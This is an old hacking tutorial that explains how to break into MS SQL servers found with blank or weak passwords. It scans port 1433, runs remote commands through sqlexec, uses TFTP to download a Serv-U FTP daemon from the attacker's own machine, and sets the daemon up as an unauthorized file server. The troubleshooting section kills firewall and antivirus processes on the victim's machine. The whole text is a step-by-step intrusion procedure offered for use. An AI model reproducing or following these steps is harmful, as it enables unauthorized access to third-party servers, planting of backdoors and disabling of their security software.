Okay This tutorial assumes you have already created a Servudaemon.

ini
and that you have the following tools
Sfind
Xscan
Sqlexec
Tftp Server
ServUDaemon.exe, ServuDaemon.ini and TzoLibr.dll
A brain - (Required!)
A internet connection
A pc
Tlist.exe
Kill.exe
**********************
Tool Description
**********************
ServUDaemon.exe -Your soon to be Server executable
ServuDaemon.ini -The ini file for your Daemon, stores all your settings and user
s
TzoLibr.dll - Required for ServUdaemon to run.
Sfind - Command line scanner used like this Sfind -p 1433 <start ip> <end ip>
Xscan - Used to verify your sfind results and find the user name/password for sq
l servers.
Brain, Pc, Internet connection - If you dont have any of these your on your own.
***********************
The procedure
***********************
Okay First we want to setup Tftp
Put ServUdaemon.ini, ServUdaemon.exe and TzoLibr.dll, along with
Tlist.exe and Kill.exe into a folder called ftp on your C drive
Open Tftp Server and change the settings like this:
Security: Standard
Timeout: 40000
Max Retransmit: 60000
Base Directory: c:\ftp
Under advanced options select:
Open Negotiation
and
Show Progress bar
Im going to assume youve got your nice list of vulnerable sql servers from xscan
so start at the top of your list and copy the ip address into the sqlexec host b
ox
put the user name in the user field and pass in the password field (if there is
a password)
often youll see <null> or blank pass in your results that means leave the passwo
rd field
blank. Click 'connect' and a couple moments later the connect button should go v
oid
and the disconnect button will be highlighted.
in the CMD field type dir c:
that will show you the folders on root and how much free space is availible.
for our purposes were going to base our server in c:\winnt\system32
as we'll assume your working with a winnt system.
Next type dir /s c:\*servu* in the command box
this tells sqlexec to look for an existing server (meaning someone else is alrea
dy
using this server) on drive c:\
Assuming your not a lame stro stealer youll want to skip any that have an existi
ng server running
Okay, assuming you now have a box which is not hacked type the following into
your CMD box: tftp -i <your ip here> get ServUDaemon.ini c:\winnt\System32\ServU
Daemon.ini
and wait for the file to send(you should see a nifty little progress bar pop up
over your tftp server)
Do the same thing for ServUDaemon.exe, TzoLibr.dll, Tlist.exe and Kill.exe
Okay now you have all your hack files uploaded, You can try just running the Dae
mon
put the following into the cmd box: C:\winnt\system32\ServUDaemon.exe /h
Then try to connect to the port you have set in ServUDaemon.ini with flashfxp or
another
ftp client using the accounts you had setup.
If this works, GREAT youve hacked your first sql server.
If Not, go on to the Next section: Troubleshooting.
***************************
Troubleshooting
***************************
1.)
If the Daemon is running:
Okay hAving followed this guide so far you know that no one else is running an f
tp server
because two copies of servu wont run at the same time, so that cant be the probl
em.
This is why we uploaded 'Tlist.exe and Kill.exe'
Tlist shows all the active processes on the machine Often Norton Antivirus comes
bundled with
the Evil 'Norton Personal Firewall' and Mcafee has something similar
so these would be good places to start. Run Tlist the same way you tried to run
your ServUDaemon
by typing c:\winnt\system32\Tlist.exe
this will show you all the process on the remote machine
Is your Daemon running? If so this is a good indication of a firewall in place w
hich is preventing you from connecting
youll notice some numbers in the results from tlist it looks something like this
:
129 svchost
284 winlogon
293 mstask
387 ServUDaemon
459 Firewall(itll be named something else)
586 Icq
687 pong
in the command box type c:\winnt\system32\kill <process #>
If I wanted to kill the firewall here id type
c:\winnt\system32\kill 459
2.) If the Daemon is not running,
try shutting off Mcshield, and Norton as well as Avcosole in process as outlined
in 1.) and then try running the Daemon again. If this Still doesnt solve the pr
oblem, copy your hack files into the base windows folder
like this copy c:\winnt\system32\ServUdaemon.exe c:\winnt\
and try running the Daemon one more time.
If this still doesnt work remote access permissions may be off and the server un
hackable through the sql exploit.
I didnt write this so dont ask me any questions. It was written by some People f
or me.